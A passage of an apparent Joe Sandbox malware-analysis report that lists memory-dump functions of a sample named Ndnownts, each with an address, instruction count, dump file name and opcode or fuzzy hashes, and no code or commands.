                                                                      • Instruction Fuzzy Hash: C631C370E09289AFCB41DFA8D850AEDBFF6FF49300F1184AAD105E7252DB355A49CB52
                                                                      Function 00B6165C Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb09ec32789450a5959ca1d823a80e96e12e5d5a4e230ddd8fcb2430d9a010d6
                                                                      • Instruction ID: ea6b7f9fe6877471517342c226929f6a70c60e96e43baa87ba2a525ae11771c4
                                                                      • Opcode Fuzzy Hash: eb09ec32789450a5959ca1d823a80e96e12e5d5a4e230ddd8fcb2430d9a010d6
                                                                      • Instruction Fuzzy Hash: B33119B0D002489FCB14CFA9C584AEEBFF5EF48340F288469E549AB254DB749D45CF91
                                                                      Function 00B609DC Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ca60f01e7406990df5f3c9b71624b6eee8e3b4c94b499ecf560e62bf68054b7
                                                                      • Instruction ID: 7d52e19d234879053cd182e6ebb6dd71a2e6774959bb0403995921571d9b3a39
                                                                      • Opcode Fuzzy Hash: 9ca60f01e7406990df5f3c9b71624b6eee8e3b4c94b499ecf560e62bf68054b7
                                                                      • Instruction Fuzzy Hash: D921B434B24305CFC705BBE6C8819AF77F5FF84780B2088E9D1069B255EB789D059BA2
                                                                      Function 00B61668 Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb52f34451bd91e820dd603329edcd34d64d65b1b8d87c2196fe53a4cb5c2143
                                                                      • Instruction ID: 1c9d0b9bcf2f122661e7a3ef9d098ef774f83922afd76da59f0cb1d511ffed4a
                                                                      • Opcode Fuzzy Hash: cb52f34451bd91e820dd603329edcd34d64d65b1b8d87c2196fe53a4cb5c2143
                                                                      • Instruction Fuzzy Hash: 243139B0D002489FCB14CFA9C584AEEBFF5EF48340F248469E809AB250DB349D45CF90
                                                                      Function 00B695A8 Relevance: .1, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2d99c92e7a14d0253fc4cd02f33a340c9ea88c418f83f23e87a2402d3a741661
                                                                      • Instruction ID: 4d31574f203eb3360e9b9d627a08d05733936ed33002dc989f882f4b4539c1d1
                                                                      • Opcode Fuzzy Hash: 2d99c92e7a14d0253fc4cd02f33a340c9ea88c418f83f23e87a2402d3a741661
                                                                      • Instruction Fuzzy Hash: B33112B0D40209DFCB44DFAAC4845ADBBFAFF98300F1484A5D506E7224EB799A45CF50
                                                                      Function 00B691A0 Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f34f7c20414ce728a24434779ef16a0a6ac2e59fb44c82a87805fca3f9665ef
                                                                      • Instruction ID: ed847bcd45d014f2c64440286b305ab6053a6d4794e7bb425f63757864c44d58
                                                                      • Opcode Fuzzy Hash: 8f34f7c20414ce728a24434779ef16a0a6ac2e59fb44c82a87805fca3f9665ef
                                                                      • Instruction Fuzzy Hash: 89315A70D05209EFD744DFA9C44879EBBF6FF8A301F2080AAD105E7251DB784A88CB52
                                                                      Function 00B696C1 Relevance: .1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 528e8de0f81c5ac2b7264e2c1bfb75e19176e13c2af1732579e7a60c91496df7
                                                                      • Instruction ID: 7b909f4ea8285b06381cd5270becbf9c382a37b3a5d69ff7a84e9b188a4ba70a
                                                                      • Opcode Fuzzy Hash: 528e8de0f81c5ac2b7264e2c1bfb75e19176e13c2af1732579e7a60c91496df7
                                                                      • Instruction Fuzzy Hash: 24316870D45249CFCB05CFA9D8485ADBBFAFF59300F1884A6D50AE7225EB799940CF90
                                                                      Function 00B6D1E0 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26b1efaa4be4eb6769a747c32ee0e5da6a0ff7bb7364c1de82782ae05d1dbc65
                                                                      • Instruction ID: cd9ce60eb81752a0342d1f526c451c5d745e65954207ef808689db192ab71b9e
                                                                      • Opcode Fuzzy Hash: 26b1efaa4be4eb6769a747c32ee0e5da6a0ff7bb7364c1de82782ae05d1dbc65
                                                                      • Instruction Fuzzy Hash: 112137B0E002098BDB04DFA9D9542EEBBF6FF89300F109469E215A3294DB784A45CF91
                                                                      Function 0080D3B4 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740542301.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fed2d00f4a0eb8ca52f2264525db551c36a56c0e1b4dc3227e31658d299b9b70
                                                                      • Instruction ID: 79b806d2b4a6caac6026d12729588871488ace51c798174a5da367855c956589
                                                                      • Opcode Fuzzy Hash: fed2d00f4a0eb8ca52f2264525db551c36a56c0e1b4dc3227e31658d299b9b70
                                                                      • Instruction Fuzzy Hash: DC210372500704DFCB45DF54D9C0B26BF65FB94314F20C569E9098B296C336E856C6A2
                                                                      Function 00B691B0 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0bae7a87e6cb899812541e6c8270884d47d69ea3d22c2c00b48271057845f4c8
                                                                      • Instruction ID: a17d11d5d712d963738d8e3b9c848554e363cc34e8811985239a1015b45739c1
                                                                      • Opcode Fuzzy Hash: 0bae7a87e6cb899812541e6c8270884d47d69ea3d22c2c00b48271057845f4c8
                                                                      • Instruction Fuzzy Hash: 44312B74D01109EFD744DFA9C44879DBBFAFF89301F2080A5D109A7251DB784A84DF52
                                                                      Function 0081D030 Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740574073.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_81d000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e656509c238c389492cccce9edfb21c553df2afe2bf57248e8aa17797c91681
                                                                      • Instruction ID: e519b6bcffe57543f8e0d836a6ad8f89a0be5a73c6f4a78fe120efa58355fa8b
                                                                      • Opcode Fuzzy Hash: 1e656509c238c389492cccce9edfb21c553df2afe2bf57248e8aa17797c91681
                                                                      • Instruction Fuzzy Hash: 07212571504704DFCB10DF14D9C4B67BFA9FF88314F20C169D8098B246C336D886CAA2
                                                                      Function 00B60D70 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e36a818847d19f06592bd2d76b6e8080fa8915a5d41dce7beb31c24ad1226806
                                                                      • Instruction ID: 7c784efe1fdfbe291a21e2ea131638dda35a1bf8aa25f67ab816046182c8adc2
                                                                      • Opcode Fuzzy Hash: e36a818847d19f06592bd2d76b6e8080fa8915a5d41dce7beb31c24ad1226806
                                                                      • Instruction Fuzzy Hash: 32219830F14114DBC744FBEA84852AFB7F6EB89310F3049BAD507E7280DA796D0197A6
                                                                      Function 05563798 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47f1a559acc1cb94b56a79a0e15cdbc7602585c18ff6466feaacbd7a2647ecd1
                                                                      • Instruction ID: 51981045dedb460b55c9962a999975161b36feff13d317c7264bad3ea226bc05
                                                                      • Opcode Fuzzy Hash: 47f1a559acc1cb94b56a79a0e15cdbc7602585c18ff6466feaacbd7a2647ecd1
                                                                      • Instruction Fuzzy Hash: 06215EB4E042499FDB44DFA8D8447EEBBF6FF49300F11886AD105A7295C7385A49CF52
                                                                      Function 055637A8 Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2d396be091b6d862b628f122e9cc29f726c8dbd2cc4884b7103c37306f2f35d7
                                                                      • Instruction ID: c002e46cc30c6efa9d0c1247d6632b7bcdcb0d1327c4e6fdf79ab8d4b063a760
                                                                      • Opcode Fuzzy Hash: 2d396be091b6d862b628f122e9cc29f726c8dbd2cc4884b7103c37306f2f35d7
                                                                      • Instruction Fuzzy Hash: 27215C70E04249DFCB44DFA9D8447EEBBFAFB89300F108869D105A7294DB385A49CF92
                                                                      Function 05566859 Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5cffb647f4803cbe45bd5ebaf72f4c7db7ffb86456ddf3ecd23d8c774c615049
                                                                      • Instruction ID: 96552f01dc161bc9e7a9704e45e0747459115c4340b057ae56003dfd70400cd7
                                                                      • Opcode Fuzzy Hash: 5cffb647f4803cbe45bd5ebaf72f4c7db7ffb86456ddf3ecd23d8c774c615049
                                                                      • Instruction Fuzzy Hash: 4731C570A05268CFDB64CF68CC95BD9B7F6BB48304F1484EAE60DA7291D7309A89CF50
                                                                      Function 055632A7 Relevance: .1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bbee90062cdd70eb79ea81f605f2b7ba27c8fa418e6263bffaeedf4f284a7f06
                                                                      • Instruction ID: 030728f6bcdc6f19dc1ac2236fd59f265ac56932541d9d01931f5b08feb19368
                                                                      • Opcode Fuzzy Hash: bbee90062cdd70eb79ea81f605f2b7ba27c8fa418e6263bffaeedf4f284a7f06
                                                                      • Instruction Fuzzy Hash: FF212570D05288CFCB04CF98D5587ACBBF2FB08300F115869D106AB299DB745989CB01
                                                                      Function 00B6E5D0 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 98d593fb06554df4c18af1352f35309c17a91775bf333db569e739e292696d50
                                                                      • Instruction ID: 2da5580f16836a75830ee5b9d6f7f5855e4a2f59aa077c5587b1a9006e2de425
                                                                      • Opcode Fuzzy Hash: 98d593fb06554df4c18af1352f35309c17a91775bf333db569e739e292696d50
                                                                      • Instruction Fuzzy Hash: 441107B8D04219CFCB14CF99D8446EEBBF6FB98310F10806AD515B3250D7789A45CFA5
                                                                      Function 055668D5 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb726a711c216597d550f6db8d66d0205d9b57e974aeb303d93eaa8208072b07
                                                                      • Instruction ID: 828b7d337893711c37ecf3d9d48cfe6200da1e447cdb842aabba771e4e402619
                                                                      • Opcode Fuzzy Hash: fb726a711c216597d550f6db8d66d0205d9b57e974aeb303d93eaa8208072b07
                                                                      • Instruction Fuzzy Hash: 1921E370941269CFEB60DF59CD81FE9B7B6BB09300F1084EAE50DAB251D7719A89CF60
                                                                      Function 0080D3AF Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740542301.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction ID: 81c294ce064adf83e40e519ca0929c137a0c8df7cb4d08ab8b4994d7de9284d0
                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction Fuzzy Hash: 61110372504380CFCB02CF50D9C4B16BF71FB94314F24C6A9D8094B656C336E85ACBA2
                                                                      Function 06C83418 Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56e3cf4217ac9fe7ce6fa57cd15d02b490670774f04460163cbde429be05bcd2
                                                                      • Instruction ID: 91a79309691e3b0b537b174129678d6dfdca40d367196e2c370e08fbc585a349
                                                                      • Opcode Fuzzy Hash: 56e3cf4217ac9fe7ce6fa57cd15d02b490670774f04460163cbde429be05bcd2
                                                                      • Instruction Fuzzy Hash: 37317278A062298FEB64CF18D994A99BBF5FF49310F1480D9E848A7356DB309E85CF41
                                                                      Function 0081D02B Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740574073.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_81d000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                      • Instruction ID: 1c433399811d08d0356d5858bade6c7b1a30a3cb82668c8589c5e47be0ed9330
                                                                      • Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                      • Instruction Fuzzy Hash: D811BE76504680DFCB12CF14D9C4B56BF61FB88314F24C2AAD8094B656C33AD85ACBA2
                                                                      Function 05560790 Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e79b49fefb797085336f786f1aee469383c26e7e3e5686c703e65352768021d
                                                                      • Instruction ID: 2bc06144ef8420d066ca388c802a9a9a5240e70619ce4759dda41f0a15e4e776
                                                                      • Opcode Fuzzy Hash: 5e79b49fefb797085336f786f1aee469383c26e7e3e5686c703e65352768021d
                                                                      • Instruction Fuzzy Hash: D521E774A052188FDB64DF68D8A4B9EB7B6FB48300F1080E9D60AA7398CB345E85DF51
                                                                      Function 00B60AE0 Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6aa8b396596eae56243b132ae69d015a95ba6059109cc56d403f53e6eafabd1
                                                                      • Instruction ID: fa546fccac4831c6e2013b103230e6848d1c3ef458c2dbe1c3044b7b1d1c1513
                                                                      • Opcode Fuzzy Hash: b6aa8b396596eae56243b132ae69d015a95ba6059109cc56d403f53e6eafabd1
                                                                      • Instruction Fuzzy Hash: 1F014C30A2410AEBC748BBA684D52BE77E1BB40748F64C8D5C50696240EB385A069B52
                                                                      Function 055605F2 Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0964ad551dd0ff799546d7877a1591aaa6141efbd90ffb79c0cbc5b419061c58
                                                                      • Instruction ID: f2d94bb5e5c72c5f1e763c930ef4f3868a1239cd76f4343001e0a784bafbbcef
                                                                      • Opcode Fuzzy Hash: 0964ad551dd0ff799546d7877a1591aaa6141efbd90ffb79c0cbc5b419061c58
                                                                      • Instruction Fuzzy Hash: 1521E774E052188FDB64DF68D8A4B9EB7B6FB48300F1081E9D60AE7398CA345E85DF51
                                                                      Function 055652E8 Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cf48e9215979950aab04f385249bf4507cb64cef01f9c6b9890856ad87a49ed
                                                                      • Instruction ID: c8d6974aa71e79a8f0842e3ec2ee0ead6bfd32937ed65a75ea2a1b0f18aa144a
                                                                      • Opcode Fuzzy Hash: 0cf48e9215979950aab04f385249bf4507cb64cef01f9c6b9890856ad87a49ed
                                                                      • Instruction Fuzzy Hash: 8521B074A001A8CFEB60DF58C894BE9BBB2BB4A304F1084D9D54DA7350CB759E86DF11
                                                                      Function 06C9A680 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c906f6de920f8e6916fc08f9eeef34208a95936ba2b2bed389d9d900727dc136
                                                                      • Instruction ID: 9f212358b736d82f74994057bbf43640007a6cd0436251c9c7e307bb04288be1
                                                                      • Opcode Fuzzy Hash: c906f6de920f8e6916fc08f9eeef34208a95936ba2b2bed389d9d900727dc136
                                                                      • Instruction Fuzzy Hash: 91119374E01209DFCB84DFA8D549AAEBBF5FB48304F108069D919E7354E7749A41CF91
                                                                      Function 0080D76D Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740542301.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4eed15fcb86c0967dbb44eebd891890df0a4cf98f77cd09a464de0a6bd2ecced
                                                                      • Instruction ID: 512e09cdbffb0c7929518bc451200af025e867385976787ff9c8de360c86088f
                                                                      • Opcode Fuzzy Hash: 4eed15fcb86c0967dbb44eebd891890df0a4cf98f77cd09a464de0a6bd2ecced
                                                                      • Instruction Fuzzy Hash: D401D6311093449AE7608A69DDC4B67FFE8FF51324F18C42AED098A2C6C679DC41C671
                                                                      Function 00B60AF0 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e7a886827e00bab77c04a13d2950ded8e161ffd4483595156261eeae874561d
                                                                      • Instruction ID: 2064e9cfd3ccade1e18c03ab8f86bec1737b50d35e73217ac9a455b323e7af20
                                                                      • Opcode Fuzzy Hash: 7e7a886827e00bab77c04a13d2950ded8e161ffd4483595156261eeae874561d
                                                                      • Instruction Fuzzy Hash: 88014F30A2810AEAC708FBA684D02BF77F1BB40748F74C4E5C50796244EB386A069753
                                                                      Function 05566428 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94f8dadce0eef319d0b1e9dfd37baa49aa4c6e348938525caf8acb2e851bf96f
                                                                      • Instruction ID: 1059c753c302bf3cb8f346cc0f19c691761d042c4bf63b2a83ee2eb2fb037454
                                                                      • Opcode Fuzzy Hash: 94f8dadce0eef319d0b1e9dfd37baa49aa4c6e348938525caf8acb2e851bf96f
                                                                      • Instruction Fuzzy Hash: 23018B3180424AAFCF01DF98CC009EDBB75FF89320F00C51AE95967211D731A566DBA0
                                                                      Function 0080D76C Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740542301.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b4073d13170e13e6af1029a420097b248128ea71265e4edcfa93233ba4a4ae4
                                                                      • Instruction ID: 7508e38cd28fb839de36e66f25254f895e6ec9e8e623fc0516a426fd3428024b
                                                                      • Opcode Fuzzy Hash: 0b4073d13170e13e6af1029a420097b248128ea71265e4edcfa93233ba4a4ae4
                                                                      • Instruction Fuzzy Hash: 97F062714083449EE7508A16DDC4B62FFA8FB51724F18C45AED484E286C279AC45CA71
                                                                      Function 06C8405F Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30f9ec7664e252102ee8595184165ab74f62d3720e5287e52dad3a7b6513893c
                                                                      • Instruction ID: 01097cd2fabc13883402cd61d79447a37fc3dd5990f26e83d798f5591b6a113b
                                                                      • Opcode Fuzzy Hash: 30f9ec7664e252102ee8595184165ab74f62d3720e5287e52dad3a7b6513893c
                                                                      • Instruction Fuzzy Hash: 5711D378A001189FCB64DF28C894ADAB7F6FB48310F2041E6D519A7795E7305E89CF91
                                                                      Function 00B69BF3 Relevance: .0, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14d120d3481ec493a17102eb0d99d024a66acbc0789300b53b843debe25b3542
                                                                      • Instruction ID: 8024fc657391a5e6cda137edd7d6b577a6900c3786f1a6f5880fb1f58b6796a5
                                                                      • Opcode Fuzzy Hash: 14d120d3481ec493a17102eb0d99d024a66acbc0789300b53b843debe25b3542
                                                                      • Instruction Fuzzy Hash: 1B118374D412288FDB6ACF24C964798BBF5BB59300F0085EAD609A3251DB759FC0DF40
                                                                      Function 05567353 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
